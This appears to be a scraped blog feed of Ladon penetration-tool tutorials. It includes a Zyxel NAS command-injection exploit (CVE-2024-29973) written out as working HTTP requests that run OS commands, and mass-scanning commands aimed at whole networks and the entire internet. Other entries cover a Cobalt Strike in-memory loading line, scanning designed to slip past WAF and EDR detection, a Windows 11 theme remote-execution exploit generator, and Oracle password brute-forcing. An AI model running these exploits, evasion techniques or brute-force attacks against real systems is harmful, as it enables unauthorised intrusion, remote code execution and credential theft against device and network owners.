id="指定B段"><a href="#指定B段" class="headerlink" title="指定B段"></a>指定B段</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">Ladon 192.168.1.8/b CVE-2024-45216.exe</span><br><span class="line">Ladon noping 192.168.1.8/b CVE-2024-45216.exe</span><br><span class="line"></span><br><span class="line">Ladon 192.168.1.8/b CVE-2024-45216.dll</span><br><span class="line">Ladon noping 192.168.1.8/b CVE-2024-45216.dll</span><br></pre></td></tr></table></figure><h3 id="指定A段"><a href="#指定A段" class="headerlink" title="指定A段"></a>指定A段</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">Ladon 192.168.1.8/a CVE-2024-45216.exe</span><br><span class="line">Ladon noping 192.168.1.8/a CVE-2024-45216.exe</span><br><span class="line"></span><br><span class="line">Ladon 192.168.1.8/a CVE-2024-45216.dll</span><br><span class="line">Ladon noping 192.168.1.8/a CVE-2024-45216.dll</span><br></pre></td></tr></table></figure><h3 id="批量C段"><a href="#批量C段" class="headerlink" title="批量C段"></a>批量C段</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">Ladon ip24.txt CVE-2024-45216.exe</span><br><span class="line">Ladon ipc.txt CVE-2024-45216.exe</span><br><span class="line"></span><br><span class="line">Ladon noping ip24.txt CVE-2024-45216.exe</span><br><span class="line">Ladon noping ipc.txt CVE-2024-45216.exe</span><br></pre></td></tr></table></figure><p>PS: TXT存放多个目标的C段IP</p><h3 id="批量B段"><a href="#批量B段" class="headerlink" title="批量B段"></a>批量B段</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">Ladon ip16.txt CVE-2024-45216.exe</span><br><span class="line">Ladon noping ip16.txt CVE-2024-45216.exe</span><br></pre></td></tr></table></figure><p>PS: TXT存放多个目标的B段IP</p><h3 id="批量网段"><a href="#批量网段" class="headerlink" title="批量网段"></a>批量网段</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">Ladon cidr.txt CVE-2024-45216.exe</span><br><span class="line">Ladon noping cidr.txt CVE-2024-45216.exe</span><br></pre></td></tr></table></figure><p>PS: TXT存放各种IP网段,全网无差别扫描</p>]]></content>
<summary type="html">
<h1 id="Ladon-CVE-2024-45216-影响版本-Apache-Solr-5-3-0-lt-Apache-Solr-lt-8-11-4-9-0-0-lt-Apache-Solr-lt-9-7-0"><a href="#Ladon-CVE-2024-45216-影
</summary>
<category term="Ladon" scheme="http://k8gege.org/categories/Ladon/"/>
<category term="Exp" scheme="http://k8gege.org/categories/Exp/"/>
<category term="Apache Solr" scheme="http://k8gege.org/tags/Apache-Solr/"/>
<category term="CVE-2024-45216" scheme="http://k8gege.org/tags/CVE-2024-45216/"/>
</entry>
<entry>
<title>LadonExp CVE-2024-29973漏洞复现批量扫描教程</title>
<link href="http://k8gege.org/p/CVE-2024-29973.html"/>
<id>http://k8gege.org/p/CVE-2024-29973.html</id>
<published>2024-08-11T15:40:00.000Z</published>
<updated>2024-11-14T15:02:48.312Z</updated>
<content type="html"><![CDATA[<h1 id="Ladon-CVE-2024-29973-Zyxel漏洞复现批量扫描教程"><a href="#Ladon-CVE-2024-29973-Zyxel漏洞复现批量扫描教程" class="headerlink" title="Ladon CVE-2024-29973 Zyxel漏洞复现批量扫描教程"></a>Ladon CVE-2024-29973 Zyxel漏洞复现批量扫描教程</h1><p>+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++</p><script language="javascript" type="text/javascript">window.location.href="http://k8gege.org/Ladon/CVE-2024-29973.html";</script><p>LadonEXP一键生成Poc/Exp,批量漏洞挖掘,快速获取权限。使用Ladon可对C段、B段、A段、全网批量扫描,0day/1day/Nday快速利用。</p><h3 id="免责声明"><a href="#免责声明" class="headerlink" title="免责声明"></a>免责声明</h3><p>Ladon项目所涉及的技术、思路和工具仅供学习或授权渗透,非法用途后果自负。</p><h3 id="漏洞编号"><a href="#漏洞编号" class="headerlink" title="漏洞编号"></a>漏洞编号</h3><p>CVE-2024-29973</p><h3 id="影响版本"><a href="#影响版本" class="headerlink" title="影响版本"></a>影响版本</h3><p>Zyxel NAS542<br>Zyxel NAS326</p><h3 id="应用指纹"><a href="#应用指纹" class="headerlink" title="应用指纹"></a>应用指纹</h3><p>app=”ZYXEL-NAS326”</p><h3 id="漏洞简介"><a href="#漏洞简介" class="headerlink" title="漏洞简介"></a>漏洞简介</h3><p>Zyxel NAS542和Zyxel NAS326都是中国合勤(Zyxel)公司的产品。Zyxel NAS542是一款NAS(网络附加存储)设备。Zyxel NAS326是一款云存储 NAS。Zyxel NAS326 V5.21(AAZF.17)C0之前版本、NAS542 V5.21(ABAG.14)C0之前版本存在操作系统命令注入漏洞,该漏洞源于setCookie参数中存在命令注入漏洞,从而导致攻击者可通过HTTP POST请求来执行某些操作系统 (OS) 命令。</p><h3 id="配置信息"><a href="#配置信息" class="headerlink" title="配置信息"></a>配置信息</h3><p>LadonExp.ini填写漏洞相关信息,生成POC/EXP会生成本文MarkDown使用教程</p><p><img alt="image" data-original="https://k8gege.org/k8img/Ladon/exp/CVE-2024-29973/cfg.png"></p><h3 id="Payload"><a href="#Payload" class="headerlink" title="Payload"></a>Payload</h3><h4 id="POC"><a href="#POC" class="headerlink" title="POC"></a>POC</h4><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">GET /cmd,/simZysh/register_main/setCookie?c0=storage_ext_cgi+CGIGetExtStoInfo+None)+and+False+or+__import__(<span class="string">"subprocess"</span>).check_output(<span class="string">"id"</span>,+shell=True)%23</span><br><span class="line">Host: 192.168.1.8</span><br><span class="line">Content-Type: application/x-www-form-urlencoded</span><br></pre></td></tr></table></figure><p><img alt="image" data-original="https://k8gege.org/k8img/Ladon/exp/CVE-2024-29973/poc.png"></p><h4 id="EXP"><a href="#EXP" class="headerlink" title="EXP"></a>EXP</h4><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">GET /cmd,/simZysh/register_main/setCookie?c0=storage_ext_cgi+CGIGetExtStoInfo+None)+and+False+or+__import__(<span class="string">"subprocess"</span>).check_output(<span class="string">"<span class="variable">$cmd</span>$"</span>,+shell=True)%23</span><br><span class="line">Host: 192.168.1.8</span><br><span class="line">Content-Type: application/x-www-form-urlencoded</span><br></pre></td></tr></table></figure><p><img alt="image" data-original="https://k8gege.org/k8img/Ladon/exp/CVE-2024-29973/exp.png"></p><p>PS: 使用LadonExp填上对应内容,即可生成POC/EXP</p><h3 id="POC独立使用"><a href="#POC独立使用" class="headerlink" title="POC独立使用"></a>POC独立使用</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">CVE-2024-29973.exe http://192.168.1.8</span><br></pre></td></tr></table></figure><p>PS: 部分https站点需Ladon调用扫描</p><h3 id="EXP执行命令"><a href="#EXP执行命令" class="headerlink" title="EXP执行命令"></a>EXP执行命令</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">CVE-2024-29973.exe http://192.168.1.8 whoami</span><br></pre></td></tr></table></figure><p>PS: 将payload中的cmd命令如whoami替换成$cmd$ 即可生成EXP</p><h3 id="CS使用POC"><a href="#CS使用POC" class="headerlink" title="CS使用POC"></a>CS使用POC</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">beacon> execute-assembly C:\Ladon\CVE-2024-29973.exe http://192.168.1.8</span><br></pre></td></tr></table></figure><p>PS: Cobalt Strike内存加载CVE-2024-29973.exe</p><h3 id="指定URL"><a href="#指定URL" class="headerlink" title="指定URL"></a>指定URL</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">Ladon http://192.168.1.8 CVE-2024-29973.exe</span><br><span class="line">Ladon http://192.168.1.8 CVE-2024-29973.dll</span><br></pre></td></tr></table></figure><h3 id="指定IP"><a href="#指定IP" class="headerlink" title="指定IP"></a>指定IP</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">Ladon 192.168.1.8 CVE-2024-29973.exe</span><br><span class="line">Ladon 192.168.1.8 CVE-2024-29973.dll</span><br></pre></td></tr></table></figure><h3 id="批量URL"><a href="#批量URL" class="headerlink" title="批量URL"></a>批量URL</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Ladon url.txt CVE-2024-29973.exe</span><br></pre></td></tr></table></figure><p>PS:TXT可存放IP、IP:Port、URL等格式</p><p><img alt="image" data-original="https://k8gege.org/k8img/Ladon/exp/CVE-2024-29973/scan.png"></p><h3 id="批量IP"><a href="#批量IP" class="headerlink" title="批量IP"></a>批量IP</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">Ladon ip.txt CVE-2024-29973.exe</span><br><span class="line">Ladon noping ip.txt CVE-2024-29973.exe</span><br></pre></td></tr></table></figure><h3 id="指定C段"><a href="#指定C段" class="headerlink" title="指定C段"></a>指定C段</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">Ladon 192.168.1.8/24 CVE-2024-29973.exe</span><br><span class="line">Ladon noping 192.168.1.8/24 CVE-2024-29973.exe</span><br><span class="line"></span><br><span class="line">Ladon 192.168.1.8/24 CVE-2024-29973.dll</span><br><span class="line">Ladon noping 192.168.1.8/24 CVE-2024-29973.dll</span><br></pre></td></tr></table></figure><h3 id="指定B段"><a href="#指定B段" class="headerlink" title="指定B段"></a>指定B段</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">Ladon 192.168.1.8/b CVE-2024-29973.exe</span><br><span class="line">Ladon noping 192.168.1.8/b CVE-2024-29973.exe</span><br><span class="line"></span><br><span class="line">Ladon 192.168.1.8/b CVE-2024-29973.dll</span><br><span class="line">Ladon noping 192.168.1.8/b CVE-2024-29973.dll</span><br></pre></td></tr></table></figure><h3 id="指定A段"><a href="#指定A段" class="headerlink" title="指定A段"></a>指定A段</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">Ladon 192.168.1.8/a CVE-2024-29973.exe</span><br><span class="line">Ladon noping 192.168.1.8/a CVE-2024-29973.exe</span><br><span class="line"></span><br><span class="line">Ladon 192.168.1.8/a CVE-2024-29973.dll</span><br><span class="line">Ladon noping 192.168.1.8/a CVE-2024-29973.dll</span><br></pre></td></tr></table></figure><h3 id="批量C段"><a href="#批量C段" class="headerlink" title="批量C段"></a>批量C段</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">Ladon ip24.txt CVE-2024-29973.exe</span><br><span class="line">Ladon ipc.txt CVE-2024-29973.exe</span><br><span class="line"></span><br><span class="line">Ladon noping ip24.txt CVE-2024-29973.exe</span><br><span class="line">Ladon noping ipc.txt CVE-2024-29973.exe</span><br></pre></td></tr></table></figure><p>PS: TXT存放多个目标的C段IP</p><h3 id="批量B段"><a href="#批量B段" class="headerlink" title="批量B段"></a>批量B段</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">Ladon ip16.txt CVE-2024-29973.exe</span><br><span class="line">Ladon noping ip16.txt CVE-2024-29973.exe</span><br></pre></td></tr></table></figure><p>PS: TXT存放多个目标的B段IP</p><h3 id="批量网段"><a href="#批量网段" class="headerlink" title="批量网段"></a>批量网段</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">Ladon cidr.txt CVE-2024-29973.exe</span><br><span class="line">Ladon noping cidr.txt CVE-2024-29973.exe</span><br></pre></td></tr></table></figure><p>PS: TXT存放各种IP网段,全网无差别扫描</p><h3 id="DownLoad"><a href="#DownLoad" class="headerlink" title="DownLoad"></a>DownLoad</h3><p><a href="https://github.com/k8gege/Ladon/blob/master/CVE-2024-29973.rar" target="_blank" rel="noopener">https://github.com/k8gege/Ladon/blob/master/CVE-2024-29973.rar</a><br><a href="https://github.com/k8gege/Ladon/blob/master/LadonExp.exe" target="_blank" rel="noopener">https://github.com/k8gege/Ladon/blob/master/LadonExp.exe</a></p>]]></content>
<summary type="html">
<h1 id="Ladon-CVE-2024-29973-Zyxel漏洞复现批量扫描教程"><a href="#Ladon-CVE-2024-29973-Zyxel漏洞复现批量扫描教程" class="headerlink" title="Ladon CVE-2024-29973
</summary>
<category term="Ladon" scheme="http://k8gege.org/categories/Ladon/"/>
<category term="Exp" scheme="http://k8gege.org/categories/Exp/"/>
<category term="Zyxel" scheme="http://k8gege.org/tags/Zyxel/"/>
<category term="CVE-2024-29973" scheme="http://k8gege.org/tags/CVE-2024-29973/"/>
</entry>
<entry>
<title>Ladon CMS识别 FortiGate Vcenter Zimbra Exchange FireEye</title>
<link href="http://k8gege.org/p/whatcms.html"/>
<id>http://k8gege.org/p/whatcms.html</id>
<published>2024-01-08T09:00:00.000Z</published>
<updated>2024-11-28T15:44:06.539Z</updated>
<content type="html"><![CDATA[<p><a href="https://github.com/k8gege" target="_blank" rel="noopener"><img alt="Author" data-original="https://img.shields.io/badge/Author-k8gege-blueviolet"></a> <a href="https://github.com/k8gege/Ladon" target="_blank" rel="noopener"><img alt="Ladon" data-original="https://img.shields.io/badge/Ladon-12.4-yellowgreen"></a> <a href="https://github.com/k8gege/Ladon/releases" target="_blank" rel="noopener"><img alt="Bin" data-original="https://img.shields.io/badge/Ladon-Bin-ff69b4"></a> <a href="https://github.com/k8gege/Ladon/issues" target="_blank" rel="noopener"><img alt="GitHub issues" data-original="https://img.shields.io/github/issues/k8gege/Ladon"></a> <a href="https://github.com/k8gege/Ladon" target="_blank" rel="noopener"><img alt="Github Stars" data-original="https://img.shields.io/github/stars/k8gege/Ladon"></a> <a href="https://github.com/k8gege/Ladon" target="_blank" rel="noopener"><img alt="GitHub forks" data-original="https://img.shields.io/github/forks/k8gege/Ladon"></a><a href="https://github.com/k8gege/Ladon" target="_blank" rel="noopener"><img alt="GitHub license" data-original="https://img.shields.io/github/license/k8gege/Ladon"></a></p><p style="color:303030;"> <span class="fa fa-eye">Visit: <span id="busuanzi_value_page_pv"></span></span></p><p>=============================================================================================<br>+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++</p><script language="javascript" type="text/javascript">window.location.href="http://k8gege.org/Ladon/whatcms.html";</script><p>Ladon完整文档、简明使用教程,包含EXE、PowerShell、Cobalt Strike、Linux/Mac版</p><p><img alt="image" data-original="https://k8gege.org/k8img/Ladon/ico/Ico.png"></p><h3 id="Ladon简介"><a href="#Ladon简介" class="headerlink" title="Ladon简介"></a>Ladon简介</h3><p>Ladon模块化网络渗透工具,可PowerShell模块化、可CS插件化、可内存加载,无文件扫描。含端口扫描、服务识别、网络资产探测、密码审计、高危漏洞检测、漏洞利用、密码读取以及一键GetShell,支持批量A段/B段/C段以及跨网段扫描,支持URL、主机、域名列表扫描等。12.4版本内置265个功能模块,网络资产探测模块32种协议(ICMP\NBT\DNS\MAC\SMB\WMI\SSH\HTTP\HTTPS\Exchange\mssql\FTP\RDP)以及方法快速获取目标网络存活主机IP、计算机名、工作组、共享资源、网卡地址、操作系统版本、网站、子域名、中间件、开放服务、路由器、交换机、数据库、打印机等信息,高危漏洞检测16个包含Cisco、Zimbra、Exchange、DrayTek、MS17010、SMBGhost、Weblogic、ActiveMQ、Tomcat、Struts2系列、Printer等,密码审计23个含数据库(Mysql、Oracle、MSSQL)、FTP、SSH、VNC、Windows(LDAP、SMB/IPC、NBT、WMI、SmbHash、WmiHash、Winrm)、BasicAuth、Tomcat、Weblogic、Rar等,远程执行命令包含(smbexec/wmiexe/psexec/atexec/sshexec/webshell),Web指纹识别模块可识别135+(Web应用、中间件、脚本类型、页面类型)等,本地提权21+含SweetPotato\BadPotato\EfsPotato\BypassUAC,可高度自定义插件POC支持.NET程序集、DLL(C#/Delphi/VC)、PowerShell等语言编写的插件,支持通过配置INI批量调用任意外部程序或命令,EXP生成器可一键生成漏洞POC快速扩展扫描能力。Ladon支持Cobalt Strike插件化扫描快速拓展内网进行横向移动。</p><h3 id="运行环境"><a href="#运行环境" class="headerlink" title="运行环境"></a>运行环境</h3><p>跨平台:支持Windows、Linux、Mac等操作系统,不过更推荐Windows下使用<br>任意权限:支持服务、System、用户等任意权限,不会因权限低或SYS就用不了<br>各种CMD:支持远控CMD、交互式shell、webshell、powershell、反弹shell等<br>插件化:支持Cobalt Strike插件化内存加载使用,Beacon命令行或右键可视化</p><h3 id="CMS识别-资产探测-WhatCMS"><a href="#CMS识别-资产探测-WhatCMS" class="headerlink" title="CMS识别/资产探测/WhatCMS"></a>CMS识别/资产探测/WhatCMS</h3><table><thead><tr><th>模块功能</th><th>使用教程</th></tr></thead><tbody><tr><td>CMS识别 FireEye Trellix EDR NDR XDR</td><td><a href="http://k8gege.org/Ladon/cms_trellix">http://k8gege.org/Ladon/cms_trellix</a></td></tr><tr><td>CMS识别 FortiGate 飞塔防火墙</td><td><a href="http://k8gege.org/Ladon/cms_fortigate">http://k8gege.org/Ladon/cms_fortigate</a></td></tr><tr><td>CMS识别 飞塔FortiManager</td><td><a href="http://k8gege.org/Ladon/cms_fortimanager">http://k8gege.org/Ladon/cms_fortimanager</a></td></tr><tr><td>CMS识别 K8s kubernetes</td><td><a href="http://k8gege.org/Ladon/cms_k8s">http://k8gege.org/Ladon/cms_k8s</a></td></tr><tr><td>CMS识别 Draytek路由器</td><td><a href="http://k8gege.org/Ladon/cms_draytek">http://k8gege.org/Ladon/cms_draytek</a></td></tr><tr><td>CMS识别 Froxlor</td><td><a href="http://k8gege.org/Ladon/cms_froxlor">http://k8gege.org/Ladon/cms_froxlor</a></td></tr><tr><td>CMS识别 Zyxel USG</td><td><a href="http://k8gege.org/Ladon/cms_zyxel_usg">http://k8gege.org/Ladon/cms_zyxel_usg</a></td></tr><tr><td>CMS识别 Grafana</td><td><a href="http://k8gege.org/Ladon/cms_grafana">http://k8gege.org/Ladon/cms_grafana</a></td></tr><tr><td>CMS识别 HP打印机</td><td><a href="http://k8gege.org/Ladon/cms_hp_mfp">http://k8gege.org/Ladon/cms_hp_mfp</a></td></tr><tr><td>CMS识别 Vmware Vcenter</td><td><a href="http://k8gege.org/Ladon/cms_vcenter">http://k8gege.org/Ladon/cms_vcenter</a></td></tr><tr><td>CMS识别 Zimbra邮件服务器</td><td><a href="http://k8gege.org/Ladon/cms_zimbra">http://k8gege.org/Ladon/cms_zimbra</a></td></tr><tr><td>CMS识别 Exchange邮件服务器</td><td><a href="http://k8gege.org/Ladon/cms_exchange">http://k8gege.org/Ladon/cms_exchange</a></td></tr></tbody></table><h3 id="更多功能-使用教程"><a href="#更多功能-使用教程" class="headerlink" title="更多功能 使用教程"></a>更多功能 使用教程</h3><p><a href="http://k8gege.org/Ladon/">http://k8gege.org/Ladon/</a></p><h3 id="Ladon下载"><a href="#Ladon下载" class="headerlink" title="Ladon下载"></a>Ladon下载</h3><p>历史版本: <a href="https://github.com/k8gege/Ladon/releases" target="_blank" rel="noopener">https://github.com/k8gege/Ladon/releases</a><br>911版本:<a href="https://k8gege.org/Download">https://k8gege.org/Download</a></p>]]></content>
<summary type="html">
<p><a href="https://github.com/k8gege" target="_blank" rel="noopener"><img alt="Author" data-original="https://img.shields.io/badge/Author-k
</summary>
<category term="Ladon" scheme="http://k8gege.org/categories/Ladon/"/>
<category term="Ladon" scheme="http://k8gege.org/tags/Ladon/"/>
</entry>
<entry>
<title>Ladon渗透绕过WAF、EDR、防火墙扫描</title>
<link href="http://k8gege.org/p/bypassEDR.html"/>
<id>http://k8gege.org/p/bypassEDR.html</id>
<published>2023-12-26T14:34:00.000Z</published>
<updated>2024-11-14T15:02:47.860Z</updated>
<content type="html"><![CDATA[<p>=============================================================================================<br>+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++</p><script language="javascript" type="text/javascript">window.location.href="http://k8gege.org/Ladon/bypassEDR.html";</script><h3 id="BypassEDR扫描"><a href="#BypassEDR扫描" class="headerlink" title="BypassEDR扫描"></a>BypassEDR扫描</h3><p>默认扫描速度很快,有些WAF或EDR防御很强<br><br>设置几线程都有可能20分钟左右就不能扫了<br><br>bypassEDR模拟人工访问,绕过速度检测策略<br></p><p>扫描速度较慢,追求速度的愣头青不要使用<br></p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Ladon 10.1.2.8/24 MS17010 bypassEDR</span><br></pre></td></tr></table></figure><p>密码爆破相关模块暂不支持bypassEDR参数</p><h3 id="001-自定义线程扫描"><a href="#001-自定义线程扫描" class="headerlink" title="001 自定义线程扫描"></a>001 自定义线程扫描</h3><p>例子:扫描目标10.1.2段是否存在MS17010漏洞<br><br>单线程:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Ladon 10.1.2.8/24 MS17010 t=1</span><br></pre></td></tr></table></figure><p>80线程:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Ladon noping 10.1.2.8/24 MS17010 t=80</span><br></pre></td></tr></table></figure><p>高强度防护下扫描线程设置低一些,F单线程<br></p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Ladon 10.1.2.8/24 MS17010 f=1</span><br></pre></td></tr></table></figure><h3 id="002-Socks5代理扫描"><a href="#002-Socks5代理扫描" class="headerlink" title="002 Socks5代理扫描"></a>002 Socks5代理扫描</h3><p>例子:使用8线程扫描目标10.1.2段是否存在MS17010漏洞<br></p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Ladon noping 10.1.2.8/24 MS17010 t=8<br></span><br></pre></td></tr></table></figure><p>详见:<a href="http://k8gege.org/Ladon/proxy.html">http://k8gege.org/Ladon/proxy.html</a></p><p>PS:代理工具不支持Socks5,所以必须加noping参数扫描<br><br>不管是Frp还是其它同类工具,最主要是Proxifier等工具不支持ICMP协议<br><br>因为Ladon默认先用ICMP探测存活后,才使用对应模块测试<br><br>所以代理环境下得禁ping扫描,系统ping使用的就是ICMP协议</p><h3 id="Download"><a href="#Download" class="headerlink" title="Download"></a>Download</h3><p>PowerLadon: <a href="https://github.com/k8gege/PowerLadon" target="_blank" rel="noopener">https://github.com/k8gege/PowerLadon</a><br>History: <a href="http://github.com/k8gege/Ladon/releases" target="_blank" rel="noopener">http://github.com/k8gege/Ladon/releases</a><br>9.1.1:<a href="http://k8gege.org/Download">http://k8gege.org/Download</a><br>12.3:K8小密圈</p><div style="text-align: center; width: 710px; border: green solid 0px;"><img alt style="display: inline-block;width: 250px;height: 300px;" data-original="http://k8gege.org/img/k8team.jpg"></div>]]></content>
<summary type="html">
<p>=============================================================================================<br>++++++++++++++++++++++++++++++++++++++++
</summary>
<category term="Ladon" scheme="http://k8gege.org/categories/Ladon/"/>
<category term="waf" scheme="http://k8gege.org/tags/waf/"/>
<category term="edr" scheme="http://k8gege.org/tags/edr/"/>
</entry>
<entry>
<title>Ladon漏洞复现Win11 RCE CVE-2023-38146</title>
<link href="http://k8gege.org/p/CVE-2023-38146.html"/>
<id>http://k8gege.org/p/CVE-2023-38146.html</id>
<published>2023-12-26T06:30:00.000Z</published>
<updated>2024-11-14T15:02:48.297Z</updated>
<content type="html"><![CDATA[<p style="color:#fff;"> <% <span class="archive-article-date">Visit <span id="busuanzi_value_page_pv"></span>%></%></p><h3 id="Ladon"><a href="#Ladon" class="headerlink" title="Ladon"></a>Ladon</h3><p>Ladon 12.3 20231221<br>[+]SmbServer 一键SMB共享服务器,记录来访IP,访问资源等<br>[+]Win11ThemeRce CVE-2023-38146 Win11主题远程执行Exploit</p><h3 id="开启SMB服务器-支持win11主题rce"><a href="#开启SMB服务器-支持win11主题rce" class="headerlink" title="开启SMB服务器(支持win11主题rce)"></a>开启SMB服务器(支持win11主题rce)</h3><p>Ladon SmbServer </p><h3 id="生成CVE-2023-38146-poc"><a href="#生成CVE-2023-38146-poc" class="headerlink" title="生成CVE-2023-38146 poc"></a>生成CVE-2023-38146 poc</h3><p>Ladon Win11ThemeRce 192.168.1.8 </p><p>程序同根目录下放share目录 stage_3可替换成自己的dll</p><p><img alt="image" data-original="https://k8gege.org/k8img/Ladon/win11_theme_smb.png"></p><p>在Win11机器上,双击win11poc.theme,将会弹出计算器</p><p>PS:需关闭系统SMB服务,不让445端口占用</p><p><img alt="image" data-original="https://k8gege.org/k8img/Ladon/win11_theme_poc.png"></p><h3 id="工具下载"><a href="#工具下载" class="headerlink" title="工具下载"></a>工具下载</h3><p>最新版本:<a href="https://k8gege.org/Download">https://k8gege.org/Download</a><br>历史版本: <a href="https://github.com/k8gege/Ladon/releases" target="_blank" rel="noopener">https://github.com/k8gege/Ladon/releases</a></p><div style="text-align: center; width: 710px; border: green solid 0px;"><img alt style="display: inline-block;width: 250px;height: 300px;" data-original="http://k8gege.org/img/k8team.jpg"></div>]]></content>
<summary type="html">
<p style="color:#fff;">
<% <span class="archive-article-date">
Visit <span id="busuanzi_value_page_pv"></span>
%>
</%></p>
<h3 id="Ladon"
</summary>
<category term="Ladon" scheme="http://k8gege.org/categories/Ladon/"/>
<category term="Ladon" scheme="http://k8gege.org/tags/Ladon/"/>
</entry>
<entry>
<title>Ladon渗透Oracle数据库一键提权 密码爆破</title>
<link href="http://k8gege.org/p/OracleScan.html"/>
<id>http://k8gege.org/p/OracleScan.html</id>
<published>2023-12-16T06:20:00.000Z</published>
<updated>2024-11-14T15:02:49.201Z</updated>
<content type="html"><![CDATA[<p style="color:#fff;"> <% <span class="archive-article-date">Visit <span id="busuanzi_value_page_pv"></span>%></%></p><p>=============================================================================================<br>+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++</p><script language="javascript" type="text/javascript">window.location.href="http://k8gege.org/Ladon/OracleScan.html";</script><h3 id="1521端口-Oracle数据库密码爆破"><a href="#1521端口-Oracle数据库密码爆破" class="headerlink" title="1521端口 Oracle数据库密码爆破"></a>1521端口 Oracle数据库密码爆破</h3><p>Oracle不同于MS SQL Server和Mysql数据库,可对用户配置权限<br>数据库名不对,是无法连接上数据库的,比方说你获取到的密码<br>是oracle admin123 只允许连接db888数据库 就是所说的SID<br>但是网上很多工具都是使用默认的orcl数据库 导致无法爆破<br>有可能会因此错过很多Oracle数据库机器权限 </p><p>PS:SQL Server不指定数据库名也可以连 权限不够最多读取不了对应库的数据而已<br>但是填写默认的master库,即使是最低权限,也可连接上,就可用来验证爆破密码<br>而Oracle不行,填写默认的orcl,非授权用户是连不上的 不指定时Ladon默认跑orcl</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Ladon 192.168.1.8/24 OracleScan</span><br></pre></td></tr></table></figure><p><img alt="image" data-original="https://k8gege.org/k8img/Ladon/OracleScan_up.png"></p><h4 id="配置密码爆破参数"><a href="#配置密码爆破参数" class="headerlink" title="配置密码爆破参数"></a>配置密码爆破参数</h4><p>1 支持标准的user.txt和pass.txt帐密破解,爆破每个用户都需将密码跑完或跑出正确为此<br>2 支持userpass.txt(存放用户名和对应密码),用于快速验证其它机器是否存在相同帐密<br>3 支持check.txt(存放IP/端口/库名/用户/密码),不指定端口和数据库名则使用默认<br>4 Oracle数据库,需要放个sid.txt里面存放数据库名称,Ladon先检测数据库存在才爆破</p><p>user.txt和pass.txt分别存放用户、密码<br>userpass.txt存放用户密码组,即每行存放用户以及密码<br>check.txt每行存放IP\端口\用户\密码</p><h4 id="数据库口令检测"><a href="#数据库口令检测" class="headerlink" title="数据库口令检测"></a>数据库口令检测</h4><p>数据库与其它密码爆破不同,有时数据库做了权限,指定用户只能连指定库,连默认库肯定不行</p><h5 id="mssql密码验证"><a href="#mssql密码验证" class="headerlink" 